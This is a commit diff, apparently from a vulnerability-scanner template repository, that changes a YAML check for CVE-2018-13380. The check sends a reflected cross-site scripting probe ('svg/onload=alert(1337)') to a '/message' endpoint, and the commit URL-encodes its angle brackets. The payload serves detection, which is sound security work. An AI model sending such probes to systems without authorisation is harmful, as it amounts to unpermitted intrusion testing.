Update CVE-2018-13380.yaml
now browsers automatically, encodes <, > characters.patch-1
parent
428af94729
commit
cc98318db2
|
@ -12,7 +12,7 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/message?title=x&msg=%26%23<svg/onload=alert(1337)>"
|
||||
- "{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
@ -29,4 +29,4 @@ requests:
|
|||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 200
|
||||
|
|
Loading…
Reference in New Issue